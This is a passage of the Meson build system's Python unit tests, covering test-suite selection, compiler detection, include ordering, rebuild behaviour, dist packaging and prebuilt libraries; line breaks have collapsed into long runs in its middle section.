        with open(os.path.join(self.logdir, 'testlog.txt')) as f:
            default_log = f.read()

        # Run tests with explicitly using the same setup that is set as default
        self._run(self.mtest_command + ['--setup=mydefault'])
        with open(os.path.join(self.logdir, 'testlog-mydefault.txt')) as f:
            mydefault_log = f.read()

        # Run tests with another setup
        self._run(self.mtest_command + ['--setup=other'])
        with open(os.path.join(self.logdir, 'testlog-other.txt')) as f:
            other_log = f.read()

        self.assertTrue('ENV_A is 1' in default_log)
        self.assertTrue('ENV_B is 2' in default_log)
        self.assertTrue('ENV_C is 2' in default_log)

        self.assertTrue('ENV_A is 1' in mydefault_log)
        self.assertTrue('ENV_B is 2' in mydefault_log)
        self.assertTrue('ENV_C is 2' in mydefault_log)

        self.assertTrue('ENV_A is 1' in other_log)
        self.assertTrue('ENV_B is 3' in other_log)
        self.assertTrue('ENV_C is 2' in other_log)

    def assertFailedTestCount(self, failure_count, command):
        # Run a mtest command and assert that exactly failure_count tests
        # failed (mtest's exit code equals the number of failures).
        try:
            self._run(command)
            self.assertEqual(0, failure_count, 'Expected %d tests to fail.' % failure_count)
        except subprocess.CalledProcessError as e:
            self.assertEqual(e.returncode, failure_count)

    def test_suite_selection(self):
        # Exhaustively check --suite / --no-suite filtering across main
        # project and subproject suites.
        testdir = os.path.join(self.unit_test_dir, '4 suite selection')
        self.init(testdir)
        self.build()

        self.assertFailedTestCount(4, self.mtest_command)

        self.assertFailedTestCount(0, self.mtest_command + ['--suite', ':success'])
        self.assertFailedTestCount(3, self.mtest_command + ['--suite', ':fail'])
        self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', ':success'])
        self.assertFailedTestCount(1, self.mtest_command + ['--no-suite', ':fail'])

        self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj'])
        self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc'])
        self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail'])
        self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix'])
        self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj'])
        self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc'])
        self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail'])
        self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix'])

        self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj:fail'])
        self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'mainprj:success'])
        self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj:fail'])
        self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'mainprj:success'])

        self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail:fail'])
        self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjfail:success'])
        self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail:fail'])
        self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjfail:success'])

        self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:fail'])
        self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc:success'])
        self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:fail'])
        self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc:success'])

        self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix:fail'])
        self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjmix:success'])
        self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix:fail'])
        self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjmix:success'])

        self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix:fail'])
        self.assertFailedTestCount(3, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj'])
        self.assertFailedTestCount(2, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail'])
        self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail', '--suite', 'subprjmix', '--suite', 'mainprj', '--no-suite', 'subprjmix:fail', 'mainprj-failing_test'])

        self.assertFailedTestCount(2, self.mtest_command + ['--no-suite', 'subprjfail:fail', '--no-suite', 'subprjmix:fail'])

    def test_build_by_default(self):
        # Targets with build_by_default: false must only be built when
        # requested explicitly.
        testdir = os.path.join(self.common_test_dir, '130 build by default')
        self.init(testdir)
        self.build()
        genfile1 = os.path.join(self.builddir, 'generated1.dat')
        genfile2 = os.path.join(self.builddir, 'generated2.dat')
        exe1 = os.path.join(self.builddir, 'fooprog' + exe_suffix)
        exe2 = os.path.join(self.builddir, 'barprog' + exe_suffix)
        self.assertPathExists(genfile1)
        self.assertPathExists(genfile2)
        self.assertPathDoesNotExist(exe1)
        self.assertPathDoesNotExist(exe2)
        self.build(target=('fooprog' + exe_suffix))
        self.assertPathExists(exe1)
        self.build(target=('barprog' + exe_suffix))
        self.assertPathExists(exe2)

    def test_internal_include_order(self):
        # Verify the documented ordering of -I flags: private dir first,
        # then build/source subdirs, per-target args, include_directories,
        # internal dependencies, and custom target include dirs last.
        if mesonbuild.environment.detect_msys2_arch() and ('MESON_RSP_THRESHOLD' in os.environ):
            raise unittest.SkipTest('Test does not yet support gcc rsp files on msys2')

        testdir = os.path.join(self.common_test_dir, '131 include order')
        self.init(testdir)
        execmd = fxecmd = None
        for cmd in self.get_compdb():
            if 'someexe' in cmd['command']:
                execmd = cmd['command']
                continue
            if 'somefxe' in cmd['command']:
                fxecmd = cmd['command']
                continue
        if not execmd or not fxecmd:
            raise Exception('Could not find someexe and somfxe commands')
        # Check include order for 'someexe'
        incs = [a for a in split_args(execmd) if a.startswith("-I")]
        self.assertEqual(len(incs), 9)
        # Need to run the build so the private dir is created.
        self.build()
        pdirs = glob(os.path.join(self.builddir, 'sub4/someexe*.p'))
        self.assertEqual(len(pdirs), 1)
        privdir = pdirs[0][len(self.builddir)+1:]
        self.assertPathEqual(incs[0], "-I" + privdir)
        # target build subdir
        self.assertPathEqual(incs[1], "-Isub4")
        # target source subdir
        self.assertPathBasenameEqual(incs[2], 'sub4')
        # include paths added via per-target c_args: ['-I'...]
        self.assertPathBasenameEqual(incs[3], 'sub3')
        # target include_directories: build dir
        self.assertPathEqual(incs[4], "-Isub2")
        # target include_directories: source dir
        self.assertPathBasenameEqual(incs[5], 'sub2')
        # target internal dependency include_directories: build dir
        self.assertPathEqual(incs[6], "-Isub1")
        # target internal dependency include_directories: source dir
        self.assertPathBasenameEqual(incs[7], 'sub1')
        # custom target include dir
        self.assertPathEqual(incs[8], '-Ictsub')
        # Check include order for 'somefxe'
        incs = [a for a in split_args(fxecmd) if a.startswith('-I')]
        self.assertEqual(len(incs), 9)
        # target private dir
        pdirs = glob(os.path.join(self.builddir, 'somefxe*.p'))
        self.assertEqual(len(pdirs), 1)
        privdir = pdirs[0][len(self.builddir)+1:]
        self.assertPathEqual(incs[0], '-I' + privdir)
        # target build dir
        self.assertPathEqual(incs[1], '-I.')
        # target source dir
        self.assertPathBasenameEqual(incs[2], os.path.basename(testdir))
        # target internal dependency correct include_directories: build dir
        self.assertPathEqual(incs[3], "-Isub4")
        # target internal dependency correct include_directories: source dir
        self.assertPathBasenameEqual(incs[4], 'sub4')
        # target internal dependency dep include_directories: build dir
        self.assertPathEqual(incs[5], "-Isub1")
        # target internal dependency dep include_directories: source dir
        self.assertPathBasenameEqual(incs[6], 'sub1')
        # target internal dependency wrong include_directories: build dir
        self.assertPathEqual(incs[7], "-Isub2")
        # target internal dependency wrong include_directories: source dir
        self.assertPathBasenameEqual(incs[8], 'sub2')

    def test_compiler_detection(self):
        '''
        Test that automatic compiler detection and setting from the environment
        both work just fine. This is needed because while running project tests
        and other unit tests, we always read CC/CXX/etc from the environment.
        '''
        gnu = mesonbuild.compilers.GnuCompiler
        clang = mesonbuild.compilers.ClangCompiler
        intel = mesonbuild.compilers.IntelGnuLikeCompiler
        msvc = (mesonbuild.compilers.VisualStudioCCompiler, mesonbuild.compilers.VisualStudioCPPCompiler)
        clangcl = (mesonbuild.compilers.ClangClCCompiler, mesonbuild.compilers.ClangClCPPCompiler)
        ar = mesonbuild.linkers.ArLinker
        lib = mesonbuild.linkers.VisualStudioLinker
        langs = [('c', 'CC'), ('cpp', 'CXX')]
        if not is_windows() and platform.machine().lower() != 'e2k':
            langs += [('objc', 'OBJC'), ('objcpp', 'OBJCXX')]
        testdir = os.path.join(self.unit_test_dir, '5 compiler detection')
        env = get_fake_env(testdir, self.builddir, self.prefix)
        for lang, evar in langs:
            # Detect with evar and do sanity checks on that
            if evar in os.environ:
                ecc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
                self.assertTrue(ecc.version)
                elinker = env.detect_static_linker(ecc)
                # Pop it so we don't use it for the next detection
                evalue = os.environ.pop(evar)
                # Very rough/strict heuristics. Would never work for actual
                # compiler detection, but should be ok for the tests.
                ebase = os.path.basename(evalue)
                if ebase.startswith('g') or ebase.endswith(('-gcc', '-g++')):
                    self.assertIsInstance(ecc, gnu)
                    self.assertIsInstance(elinker, ar)
                elif 'clang-cl' in ebase:
                    self.assertIsInstance(ecc, clangcl)
                    self.assertIsInstance(elinker, lib)
                elif 'clang' in ebase:
                    self.assertIsInstance(ecc, clang)
                    self.assertIsInstance(elinker, ar)
                elif ebase.startswith('ic'):
                    self.assertIsInstance(ecc, intel)
                    self.assertIsInstance(elinker, ar)
                elif ebase.startswith('cl'):
                    self.assertIsInstance(ecc, msvc)
                    self.assertIsInstance(elinker, lib)
                else:
                    raise AssertionError('Unknown compiler {!r}'.format(evalue))
                # Check that we actually used the evalue correctly as the compiler
                self.assertEqual(ecc.get_exelist(), split_args(evalue))
            # Do auto-detection of compiler based on platform, PATH, etc.
            cc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
            self.assertTrue(cc.version)
            linker = env.detect_static_linker(cc)
            # Check compiler type
            if isinstance(cc, gnu):
                self.assertIsInstance(linker, ar)
                if is_osx():
                    self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
                elif is_sunos():
                    self.assertIsInstance(cc.linker, (mesonbuild.linkers.SolarisDynamicLinker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin))
                else:
                    self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
            if isinstance(cc, clangcl):
                self.assertIsInstance(linker, lib)
                self.assertIsInstance(cc.linker, mesonbuild.linkers.ClangClDynamicLinker)
            if isinstance(cc, clang):
                self.assertIsInstance(linker, ar)
                if is_osx():
                    self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
                elif is_windows():
                    # This is clang, not clang-cl. This can be either an
                    # ld-like linker of link.exe-like linker (usually the
                    # former for msys2, the latter otherwise)
                    self.assertIsInstance(cc.linker, (mesonbuild.linkers.MSVCDynamicLinker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin))
                else:
                    self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuLikeDynamicLinkerMixin)
            if isinstance(cc, intel):
                self.assertIsInstance(linker, ar)
                if is_osx():
                    self.assertIsInstance(cc.linker, mesonbuild.linkers.AppleDynamicLinker)
                elif is_windows():
                    self.assertIsInstance(cc.linker, mesonbuild.linkers.XilinkDynamicLinker)
                else:
                    self.assertIsInstance(cc.linker, mesonbuild.linkers.GnuDynamicLinker)
            if isinstance(cc, msvc):
                self.assertTrue(is_windows())
                self.assertIsInstance(linker, lib)
                self.assertEqual(cc.id, 'msvc')
                self.assertTrue(hasattr(cc, 'is_64'))
                self.assertIsInstance(cc.linker, mesonbuild.linkers.MSVCDynamicLinker)
                # If we're on Windows CI, we know what the compiler will be
                if 'arch' in os.environ:
                    if os.environ['arch'] == 'x64':
                        self.assertTrue(cc.is_64)
                    else:
                        self.assertFalse(cc.is_64)
            # Set evar ourselves to a wrapper script that just calls the same
            # exelist + some argument. This is meant to test that setting
            # something like `ccache gcc -pipe` or `distcc ccache gcc` works.
            wrapper = os.path.join(testdir, 'compiler wrapper.py')
            wrappercc = python_command + [wrapper] + cc.get_exelist() + ['-DSOME_ARG']
            os.environ[evar] = ' '.join(quote_arg(w) for w in wrappercc)

            # Check static linker too
            wrapperlinker = python_command + [wrapper] + linker.get_exelist() + linker.get_always_args()
            os.environ['AR'] = ' '.join(quote_arg(w) for w in wrapperlinker)

            # Need a new env to re-run environment loading
            env = get_fake_env(testdir, self.builddir, self.prefix)

            wcc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
            wlinker = env.detect_static_linker(wcc)
            # Pop it so we don't use it for the next detection
            evalue = os.environ.pop('AR')
            # Must be the same type since it's a wrapper around the same exelist
            self.assertIs(type(cc), type(wcc))
            self.assertIs(type(linker), type(wlinker))
            # Ensure that the exelist is correct
            self.assertEqual(wcc.get_exelist(), wrappercc)
            self.assertEqual(wlinker.get_exelist(), wrapperlinker)
            # Ensure that the version detection worked correctly
            self.assertEqual(cc.version, wcc.version)
            if hasattr(cc, 'is_64'):
                self.assertEqual(cc.is_64, wcc.is_64)

    def test_always_prefer_c_compiler_for_asm(self):
        # .S assembly files must always be compiled and linked with the C
        # toolchain, even in C++/mixed-language targets.
        testdir = os.path.join(self.common_test_dir, '134 c cpp and asm')
        # Skip if building with MSVC
        env = get_fake_env(testdir, self.builddir, self.prefix)
        if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'msvc':
            raise unittest.SkipTest('MSVC can\'t compile assembly')
        self.init(testdir)
        commands = {'c-asm': {}, 'cpp-asm': {}, 'cpp-c-asm': {}, 'c-cpp-asm': {}}
        for cmd in self.get_compdb():
            # Get compiler
            split = split_args(cmd['command'])
            if split[0] == 'ccache':
                compiler = split[1]
            else:
                compiler = split[0]
            # Classify commands
            if 'Ic-asm' in cmd['command']:
                if cmd['file'].endswith('.S'):
                    commands['c-asm']['asm'] = compiler
                elif cmd['file'].endswith('.c'):
                    commands['c-asm']['c'] = compiler
                else:
                    raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command']))
            elif 'Icpp-asm' in cmd['command']:
                if cmd['file'].endswith('.S'):
                    commands['cpp-asm']['asm'] = compiler
                elif cmd['file'].endswith('.cpp'):
                    commands['cpp-asm']['cpp'] = compiler
                else:
                    raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command']))
            elif 'Ic-cpp-asm' in cmd['command']:
                if cmd['file'].endswith('.S'):
                    commands['c-cpp-asm']['asm'] = compiler
                elif cmd['file'].endswith('.c'):
                    commands['c-cpp-asm']['c'] = compiler
                elif cmd['file'].endswith('.cpp'):
                    commands['c-cpp-asm']['cpp'] = compiler
                else:
                    raise AssertionError('{!r} found in c-cpp-asm?'.format(cmd['command']))
            elif 'Icpp-c-asm' in cmd['command']:
                if cmd['file'].endswith('.S'):
                    commands['cpp-c-asm']['asm'] = compiler
                elif cmd['file'].endswith('.c'):
                    commands['cpp-c-asm']['c'] = compiler
                elif cmd['file'].endswith('.cpp'):
                    commands['cpp-c-asm']['cpp'] = compiler
                else:
                    raise AssertionError('{!r} found in cpp-c-asm?'.format(cmd['command']))
            else:
                raise AssertionError('Unknown command {!r} found'.format(cmd['command']))
        # Check that .S files are always built with the C compiler
        self.assertEqual(commands['c-asm']['asm'], commands['c-asm']['c'])
        self.assertEqual(commands['c-asm']['asm'], commands['cpp-asm']['asm'])
        self.assertEqual(commands['cpp-asm']['asm'], commands['c-cpp-asm']['c'])
        self.assertEqual(commands['c-cpp-asm']['asm'], commands['c-cpp-asm']['c'])
        self.assertEqual(commands['cpp-c-asm']['asm'], commands['cpp-c-asm']['c'])
        self.assertNotEqual(commands['cpp-asm']['asm'], commands['cpp-asm']['cpp'])
        self.assertNotEqual(commands['c-cpp-asm']['c'], commands['c-cpp-asm']['cpp'])
        self.assertNotEqual(commands['cpp-c-asm']['c'], commands['cpp-c-asm']['cpp'])
        # Check that the c-asm target is always linked with the C linker
        build_ninja = os.path.join(self.builddir, 'build.ninja')
        with open(build_ninja, 'r', encoding='utf-8') as f:
            contents = f.read()
            m = re.search('build c-asm.*: c_LINKER', contents)
        self.assertIsNotNone(m, msg=contents)

    def
test_preprocessor_checks_CPPFLAGS(self): ''' Test that preprocessor compiler checks read CPPFLAGS and also CFLAGS but not LDFLAGS. ''' testdir = os.path.join(self.common_test_dir, '133 get define') define = 'MESON_TEST_DEFINE_VALUE' # NOTE: this list can't have \n, ' or " # \n is never substituted by the GNU pre-processor via a -D define # ' and " confuse split_args() even when they are escaped # % and # confuse the MSVC preprocessor # !, ^, *, and < confuse lcc preprocessor value = 'spaces and fun@$&()-=_+{}[]:;>?,./~`' for env_var in ['CPPFLAGS', 'CFLAGS']: env = {} env[env_var] = '-D{}="{}"'.format(define, value) env['LDFLAGS'] = '-DMESON_FAIL_VALUE=cflags-read'.format(define) self.init(testdir, extra_args=['-D{}={}'.format(define, value)], override_envvars=env) def test_custom_target_exe_data_deterministic(self): testdir = os.path.join(self.common_test_dir, '110 custom target capture') self.init(testdir) meson_exe_dat1 = glob(os.path.join(self.privatedir, 'meson_exe*.dat')) self.wipe() self.init(testdir) meson_exe_dat2 = glob(os.path.join(self.privatedir, 'meson_exe*.dat')) self.assertListEqual(meson_exe_dat1, meson_exe_dat2) def test_noop_changes_cause_no_rebuilds(self): ''' Test that no-op changes to the build files such as mtime do not cause a rebuild of anything. ''' testdir = os.path.join(self.common_test_dir, '6 linkshared') self.init(testdir) self.build() # Immediately rebuilding should not do anything self.assertBuildIsNoop() # Changing mtime of meson.build should not rebuild anything self.utime(os.path.join(testdir, 'meson.build')) self.assertReconfiguredBuildIsNoop() # Changing mtime of libefile.c should rebuild the library, but not relink the executable self.utime(os.path.join(testdir, 'libfile.c')) self.assertBuildRelinkedOnlyTarget('mylib') def test_source_changes_cause_rebuild(self): ''' Test that changes to sources and headers cause rebuilds, but not changes to unused files (as determined by the dependency file) in the input files list. 
        '''
        testdir = os.path.join(self.common_test_dir, '20 header in file list')
        self.init(testdir)
        self.build()
        # Immediately rebuilding should not do anything
        self.assertBuildIsNoop()
        # Changing mtime of header.h should rebuild everything
        self.utime(os.path.join(testdir, 'header.h'))
        self.assertBuildRelinkedOnlyTarget('prog')

    def test_custom_target_changes_cause_rebuild(self):
        '''
        Test that in a custom target, changes to the input files, the
        ExternalProgram, and any File objects on the command-line cause
        a rebuild.
        '''
        testdir = os.path.join(self.common_test_dir, '58 custom header generator')
        self.init(testdir)
        self.build()
        # Immediately rebuilding should not do anything
        self.assertBuildIsNoop()
        # Changing mtime of these should rebuild everything
        for f in ('input.def', 'makeheader.py', 'somefile.txt'):
            self.utime(os.path.join(testdir, f))
            self.assertBuildRelinkedOnlyTarget('prog')

    def test_source_generator_program_cause_rebuild(self):
        '''
        Test that changes to generator programs in the source tree cause
        a rebuild.
        '''
        testdir = os.path.join(self.common_test_dir, '91 gen extra')
        self.init(testdir)
        self.build()
        # Immediately rebuilding should not do anything
        self.assertBuildIsNoop()
        # Changing mtime of generator should rebuild the executable
        self.utime(os.path.join(testdir, 'srcgen.py'))
        self.assertRebuiltTarget('basic')

    def test_static_library_lto(self):
        '''
        Test that static libraries can be built with LTO and linked to
        executables. On Linux, this requires the use of gcc-ar.
        https://github.com/mesonbuild/meson/issues/1646
        '''
        testdir = os.path.join(self.common_test_dir, '5 linkstatic')
        env = get_fake_env(testdir, self.builddir, self.prefix)
        if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'clang' and is_windows():
            raise unittest.SkipTest('LTO not (yet) supported by windows clang')
        self.init(testdir, extra_args='-Db_lto=true')
        self.build()
        self.run_tests()

    def test_dist_git(self):
        # 'meson dist' of a git-tracked project; dist_impl does the real work.
        if not shutil.which('git'):
            raise unittest.SkipTest('Git not found')
        if self.backend is not Backend.ninja:
            raise unittest.SkipTest('Dist is only supported with Ninja')
        try:
            self.dist_impl(_git_init)
        except PermissionError:
            # When run under Windows CI, something (virus scanner?)
            # holds on to the git files so cleaning up the dir
            # fails sometimes.
            pass

    def has_working_hg(self):
        # Returns True only if an 'hg' binary exists AND actually runs;
        # note this does not use self at all.
        if not shutil.which('hg'):
            return False
        try:
            # This check should not be necessary, but
            # CI under macOS passes the above test even
            # though Mercurial is not installed.
            if subprocess.call(['hg', '--version'],
                               stdout=subprocess.DEVNULL,
                               stderr=subprocess.DEVNULL) != 0:
                return False
            return True
        except FileNotFoundError:
            return False

    def test_dist_hg(self):
        # Same as test_dist_git but with a Mercurial-tracked project.
        if not self.has_working_hg():
            raise unittest.SkipTest('Mercurial not found or broken.')
        if self.backend is not Backend.ninja:
            raise unittest.SkipTest('Dist is only supported with Ninja')

        def hg_init(project_dir):
            # Minimal hg repo: init, set a username, add and commit the files
            # that dist_impl creates.
            subprocess.check_call(['hg', 'init'], cwd=project_dir)
            with open(os.path.join(project_dir, '.hg', 'hgrc'), 'w') as f:
                print('[ui]', file=f)
                print('username=Author Person <teh_coderz@example.com>', file=f)
            subprocess.check_call(['hg', 'add', 'meson.build', 'distexe.c'], cwd=project_dir)
            subprocess.check_call(['hg', 'commit', '-m', 'I am a project'], cwd=project_dir)

        try:
            self.dist_impl(hg_init, include_subprojects=False)
        except PermissionError:
            # When run under Windows CI, something (virus scanner?)
            # holds on to the hg files so cleaning up the dir
            # fails sometimes.
pass def test_dist_git_script(self): if not shutil.which('git'): raise unittest.SkipTest('Git not found') if self.backend is not Backend.ninja: raise unittest.SkipTest('Dist is only supported with Ninja') try: with tempfile.TemporaryDirectory() as tmpdir: project_dir = os.path.join(tmpdir, 'a') shutil.copytree(os.path.join(self.unit_test_dir, '35 dist script'), project_dir) _git_init(project_dir) self.init(project_dir) self.build('dist') except PermissionError: # When run under Windows CI, something (virus scanner?) # holds on to the git files so cleaning up the dir # fails sometimes. pass def create_dummy_subproject(self, project_dir, name): path = os.path.join(project_dir, 'subprojects', name) os.makedirs(path) with open(os.path.join(path, 'meson.build'), 'w') as ofile: ofile.write("project('{}')".format(name)) return path def dist_impl(self, vcs_init, include_subprojects=True): # Create this on the fly because having rogue .git directories inside # the source tree leads to all kinds of trouble. 
with tempfile.TemporaryDirectory() as project_dir: with open(os.path.join(project_dir, 'meson.build'), 'w') as ofile: ofile.write(textwrap.dedent('''\ project('disttest', 'c', version : '1.4.3') e = executable('distexe', 'distexe.c') test('dist test', e) subproject('vcssub', required : false) subproject('tarballsub', required : false) ''')) with open(os.path.join(project_dir, 'distexe.c'), 'w') as ofile: ofile.write(textwrap.dedent('''\ #include<stdio.h> int main(int argc, char **argv) { printf("I am a distribution test.\\n"); return 0; } ''')) xz_distfile = os.path.join(self.distdir, 'disttest-1.4.3.tar.xz') xz_checksumfile = xz_distfile + '.sha256sum' zip_distfile = os.path.join(self.distdir, 'disttest-1.4.3.zip') zip_checksumfile = zip_distfile + '.sha256sum' vcs_init(project_dir) if include_subprojects: vcs_init(self.create_dummy_subproject(project_dir, 'vcssub')) self.create_dummy_subproject(project_dir, 'tarballsub') self.create_dummy_subproject(project_dir, 'unusedsub') self.init(project_dir) self.build('dist') self.assertPathExists(xz_distfile) self.assertPathExists(xz_checksumfile) self.assertPathDoesNotExist(zip_distfile) self.assertPathDoesNotExist(zip_checksumfile) self._run(self.meson_command + ['dist', '--formats', 'zip'], workdir=self.builddir) self.assertPathExists(zip_distfile) self.assertPathExists(zip_checksumfile) if include_subprojects: z = zipfile.ZipFile(zip_distfile) self.assertEqual(sorted(['disttest-1.4.3/', 'disttest-1.4.3/meson.build', 'disttest-1.4.3/distexe.c']), sorted(z.namelist())) self._run(self.meson_command + ['dist', '--formats', 'zip', '--include-subprojects'], workdir=self.builddir) z = zipfile.ZipFile(zip_distfile) self.assertEqual(sorted(['disttest-1.4.3/', 'disttest-1.4.3/subprojects/', 'disttest-1.4.3/meson.build', 'disttest-1.4.3/distexe.c', 'disttest-1.4.3/subprojects/tarballsub/', 'disttest-1.4.3/subprojects/vcssub/', 'disttest-1.4.3/subprojects/tarballsub/meson.build', 'disttest-1.4.3/subprojects/vcssub/meson.build']), 
sorted(z.namelist())) def test_rpath_uses_ORIGIN(self): ''' Test that built targets use $ORIGIN in rpath, which ensures that they are relocatable and ensures that builds are reproducible since the build directory won't get embedded into the built binaries. ''' if is_windows() or is_cygwin(): raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH') testdir = os.path.join(self.common_test_dir, '40 library chain') self.init(testdir) self.build() for each in ('prog', 'subdir/liblib1.so', ): rpath = get_rpath(os.path.join(self.builddir, each)) self.assertTrue(rpath, 'Rpath could not be determined for {}.'.format(each)) if is_dragonflybsd(): # DragonflyBSD will prepend /usr/lib/gccVERSION to the rpath, # so ignore that. self.assertTrue(rpath.startswith('/usr/lib/gcc')) rpaths = rpath.split(':')[1:] else: rpaths = rpath.split(':') for path in rpaths: self.assertTrue(path.startswith('$ORIGIN'), msg=(each, path)) # These two don't link to anything else, so they do not need an rpath entry. for each in ('subdir/subdir2/liblib2.so', 'subdir/subdir3/liblib3.so'): rpath = get_rpath(os.path.join(self.builddir, each)) if is_dragonflybsd(): # The rpath should be equal to /usr/lib/gccVERSION self.assertTrue(rpath.startswith('/usr/lib/gcc')) self.assertEqual(len(rpath.split(':')), 1) else: self.assertTrue(rpath is None) def test_dash_d_dedup(self): testdir = os.path.join(self.unit_test_dir, '9 d dedup') self.init(testdir) cmd = self.get_compdb()[0]['command'] self.assertTrue('-D FOO -D BAR' in cmd or '"-D" "FOO" "-D" "BAR"' in cmd or '/D FOO /D BAR' in cmd or '"/D" "FOO" "/D" "BAR"' in cmd) def test_all_forbidden_targets_tested(self): ''' Test that all forbidden targets are tested in the '151 reserved targets' test. Needs to be a unit test because it accesses Meson internals. 
''' testdir = os.path.join(self.common_test_dir, '151 reserved targets') targets = mesonbuild.coredata.FORBIDDEN_TARGET_NAMES # We don't actually define a target with this name targets.pop('build.ninja') # Remove this to avoid multiple entries with the same name # but different case. targets.pop('PHONY') for i in targets: self.assertPathExists(os.path.join(testdir, i)) def detect_prebuild_env(self): env = get_fake_env() cc = env.detect_c_compiler(MachineChoice.HOST) stlinker = env.detect_static_linker(cc) if mesonbuild.mesonlib.is_windows(): object_suffix = 'obj' shared_suffix = 'dll' elif mesonbuild.mesonlib.is_cygwin(): object_suffix = 'o' shared_suffix = 'dll' elif mesonbuild.mesonlib.is_osx(): object_suffix = 'o' shared_suffix = 'dylib' else: object_suffix = 'o' shared_suffix = 'so' return (cc, stlinker, object_suffix, shared_suffix) def pbcompile(self, compiler, source, objectfile, extra_args=None): cmd = compiler.get_exelist() extra_args = extra_args or [] if compiler.get_argument_syntax() == 'msvc': cmd += ['/nologo', '/Fo' + objectfile, '/c', source] + extra_args else: cmd += ['-c', source, '-o', objectfile] + extra_args subprocess.check_call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) def test_prebuilt_object(self): (compiler, _, object_suffix, _) = self.detect_prebuild_env() tdir = os.path.join(self.unit_test_dir, '15 prebuilt object') source = os.path.join(tdir, 'source.c') objectfile = os.path.join(tdir, 'prebuilt.' 
+ object_suffix) self.pbcompile(compiler, source, objectfile) try: self.init(tdir) self.build() self.run_tests() finally: os.unlink(objectfile) def build_static_lib(self, compiler, linker, source, objectfile, outfile, extra_args=None): if extra_args is None: extra_args = [] if compiler.get_argument_syntax() == 'msvc': link_cmd = ['lib', '/NOLOGO', '/OUT:' + outfile, objectfile] else: link_cmd = ['ar', 'csr', outfile, objectfile] link_cmd = linker.get_exelist() link_cmd += linker.get_always_args() link_cmd += linker.get_std_link_args() link_cmd += linker.get_output_args(outfile) link_cmd += [objectfile] self.pbcompile(compiler, source, objectfile, extra_args=extra_args) try: subprocess.check_call(link_cmd) finally: os.unlink(objectfile) def test_prebuilt_static_lib(self): (cc, stlinker, object_suffix, _) = self.detect_prebuild_env() tdir = os.path.join(self.unit_test_dir, '16 prebuilt static') source = os.path.join(tdir, 'libdir/best.c') objectfile = os.path.join(tdir, 'libdir/best.' + object_suffix) stlibfile = os.path.join(tdir, 'libdir/libbest.a') self.build_static_lib(cc, stlinker, source, objectfile, stlibfile) # Run the test try: self.init(tdir) self.build() self.run_tests() finally: os.unlink(stlibfile) def build_shared_lib(self, compiler, source, objectfile, outfile, impfile, extra_args=None): if extra_args is None: extra_args = [] if compiler.get_argument_syntax() == 'msvc': link_cmd = compiler.get_linker_exelist() + [ '/NOLOGO', '/DLL', '/DEBUG', '/IMPLIB:' + impfile, '/OUT:' + outfile, objectfile] else: if not (compiler.info.is_windows() or compiler.info.is_cygwin() or compiler.info.is_darwin()): extra_args += ['-fPIC'] link_cmd = compiler.get_exelist() + ['-shared', '-o', outfile, objectfile] if not mesonbuild.mesonlib.is_osx(): link_cmd += ['-Wl,-soname=' + os.path.basename(outfile)] self.pbcompile(compiler, source, objectfile, extra_args=extra_args) try: subprocess.check_call(link_cmd) finally: os.unlink(objectfile) def test_prebuilt_shared_lib(self): 
        # A prebuilt shared library in the source tree must be linkable
        # ('17 prebuilt shared' test case).
        (cc, _, object_suffix, shared_suffix) = self.detect_prebuild_env()
        tdir = os.path.join(self.unit_test_dir, '17 prebuilt shared')
        source = os.path.join(tdir, 'alexandria.c')
        objectfile = os.path.join(tdir, 'alexandria.' + object_suffix)
        impfile = os.path.join(tdir, 'alexandria.lib')
        if cc.get_argument_syntax() == 'msvc':
            shlibfile = os.path.join(tdir, 'alexandria.' + shared_suffix)
        elif is_cygwin():
            shlibfile = os.path.join(tdir, 'cygalexandria.' + shared_suffix)
        else:
            shlibfile = os.path.join(tdir, 'libalexandria.' + shared_suffix)
